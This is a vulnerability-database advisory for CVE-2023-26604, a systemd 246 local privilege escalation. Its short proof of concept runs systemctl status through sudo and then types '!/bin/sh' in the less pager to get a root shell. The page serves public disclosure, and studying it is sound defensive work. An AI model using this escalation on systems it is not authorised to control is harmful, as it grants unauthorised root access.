systemd 246 Local Root Privilege Escalation

2023.08.11
Risk: High
Local: Yes
Remote: No
CWE: CWE-264

# Exploit Title: systemd 246 - Local Privilege Escalation # Exploit Author: Iyaad Luqman K (init_6) # Application: systemd 246 # Tested on: Ubuntu 22.04 # CVE: CVE-2023-26604 systemd 246 was discovered to contain Privilege Escalation vulnerability, when the `systemctl status` command can be run as root user. This vulnerability allows a local attacker to gain root privileges. ## Proof Of Concept: 1. Run the systemctl command which can be run as root user. sudo /usr/bin/systemctl status any_service 2. The ouput is opened in a pager (less) which allows us to execute arbitrary commands. 3. Type in `!/bin/sh` in the pager to spawn a shell as root user.


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top